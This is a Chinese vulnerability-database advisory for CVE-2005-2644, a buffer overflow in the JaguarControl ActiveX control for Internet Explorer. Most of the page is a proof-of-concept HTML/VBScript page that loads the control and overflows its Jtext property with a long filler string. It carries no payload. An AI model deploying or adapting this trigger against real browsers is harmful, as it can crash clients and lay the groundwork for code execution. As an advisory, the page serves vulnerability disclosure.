JaguarControl Activex 缓冲区溢出漏洞
| 漏洞ID | 1108995 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2005-08-13 | 更新时间 | 2005-10-20 |
CVE编号
|
CVE-2005-2644 |
CNNVD-ID
|
CNNVD-200508-272 |
| 漏洞平台 | Windows | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
JaguarControl是IE中的一个Activex控件。远程攻击者可以利用JaguarControl中的溢出漏洞导致InternetExplorer崩溃,或在用户机器中执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/14558/info
Isemarket JaguarControl ActiveX control is prone to a buffer overflow. This could result in a failure of the client application invoking the control or potentially execution of arbitrary code.
<object
classid="CLSID:0FC8B38E-9293-424C-9D0E-CE60775679CF"
id="JagEditParola"></object>
<script language="vbscript">
<!--
msgbox("XXXXXXX BANKASI GUVENLIK KALKANI
v1.1.0.18"+Chr(10)+"(JaguarControl
NT/2K/XP)"+Chr(10)+"Buffer CRACKED {Tested XP SP1}" +
Chr(10) + "Bug Found: Tacettin Karadeniz [
tacettinkaradeniz[@]yahoo.com ]")
a="1234567890qwertyuopasdfghjklzxcvbnm"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparapara0000paraparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
a= a &
"paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar"
JagEditParola.Jtext=a
--></script>
|参考资料
来源:BID
名称:14558
链接:http://www.securityfocus.com/bid/14558
来源:BUGTRAQ
名称:20050813JaguarControlActivexBufferOverflow
链接:http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2005-08/0191.html
相关推荐: IBM DB2 Unauthorized System Resource Access Vulnerability
IBM DB2 Unauthorized System Resource Access Vulnerability 漏洞ID 1097148 漏洞类型 Access Validation Error 发布时间 2005-02-10 更新时间 2005-02-1…
正文完
发表至: 网络安全漏洞
2021年4月9日
CVE编号
CNNVD-ID